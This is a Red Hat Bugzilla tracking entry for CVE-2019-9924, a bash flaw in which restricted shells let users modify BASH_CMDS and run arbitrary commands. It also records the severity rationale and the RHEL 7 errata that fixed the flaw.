Bug 1691774 (CVE-2019-9924)

Summary: CVE-2019-9924 bash: BASH_CMD is writable in restricted bash shells
Product: [Other] Security Response Reporter: Dhananjay Arunesh <darunesh>
Component: vulnerabilityAssignee: Red Hat Product Security <security-response-team>
Status: CLOSED ERRATA QA Contact:
Severity: medium Docs Contact:
Priority: medium    
Version: unspecifiedCC: admiller, bmcclain, dblechte, dfediuck, eedri, gsuckevi, kasal, kdudka, markdenihan, mgoldboi, michal.skrivanek, sbonazzo, sherold, svashisht, yturgema
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: Doc Type: If docs needed, set a value
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2020-03-31 22:33:46 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:
Bug Depends On: 1691775, 1693181, 1829558, 1837053, 1837054    
Bug Blocks: 1691776    

Description Dhananjay Arunesh 2019-03-22 13:48:59 UTC 
rbash in Bash before 4.4-beta2 did not prevent the shell user from modifying BASH_CMDS, thus allowing the user to execute any command with the permissions of the shell.

Reference:
https://bugs.launchpad.net/ubuntu/+source/bash/+bug/1803441

Upstream commit:
http://git.savannah.gnu.org/cgit/bash.git/commit/CHANGES?h=bash-4.4-testing&id=955543877583837c85470f7fb8a97b7aa8d45e6c
Comment 1 Dhananjay Arunesh 2019-03-22 13:49:55 UTC 
Created bash tracking bugs for this issue:

Affects: fedora-all [bug 1691775]
Comment 4 Riccardo Schirone 2019-03-27 09:57:40 UTC 
An attacker can execute binaries with / in their names even when bash is used as a Restricted Shell, by abusing the environment variable BASH_CMDS.
Comment 12 Mark Denihan 2020-01-27 14:56:48 UTC 
Is there any plan to have this moderate issue patched on RHEL7? If so is there any ETA on that patch's availability?
Comment 13 errata-xmlrpc 2020-03-31 19:23:48 UTC 
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 7

Via RHSA-2020:1113 https://access.redhat.com/errata/RHSA-2020:1113
Comment 14 Product Security DevOps Team 2020-03-31 22:33:46 UTC 
This bug is now closed. Further updates for individual products will be reflected on the CVE page(s):

https://access.redhat.com/security/cve/cve-2019-9924
Comment 16 Riccardo Schirone 2020-05-04 08:58:06 UTC 
Statement:

Impact of the flaw set to Moderate as restricted shell shall not be used as a security feature alone, as it is very hard to configure it properly and several bypasses exist for it.

This issue did not affect the versions of bash as shipped with Red Hat Enterprise Linux 5 as they did not include support for BASH_CMDS environment variable.

Red Hat Virtualization Hypervisor and Management Appliance were affected by this issue, but do not use the restricted bash shell in a way that would be exposed to attackers.  Future updates may address this issue.
Comment 19 errata-xmlrpc 2020-08-18 12:49:38 UTC 
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 7.6 Extended Update Support

Via RHSA-2020:3474 https://access.redhat.com/errata/RHSA-2020:3474
Comment 20 errata-xmlrpc 2020-09-01 16:31:25 UTC 
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 7.7 Extended Update Support

Via RHSA-2020:3592 https://access.redhat.com/errata/RHSA-2020:3592
Comment 22 errata-xmlrpc 2020-09-22 11:38:09 UTC 
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 7.4 Advanced Update Support
  Red Hat Enterprise Linux 7.4 Telco Extended Update Support
  Red Hat Enterprise Linux 7.4 Update Services for SAP Solutions

Via RHSA-2020:3803 https://access.redhat.com/errata/RHSA-2020:3803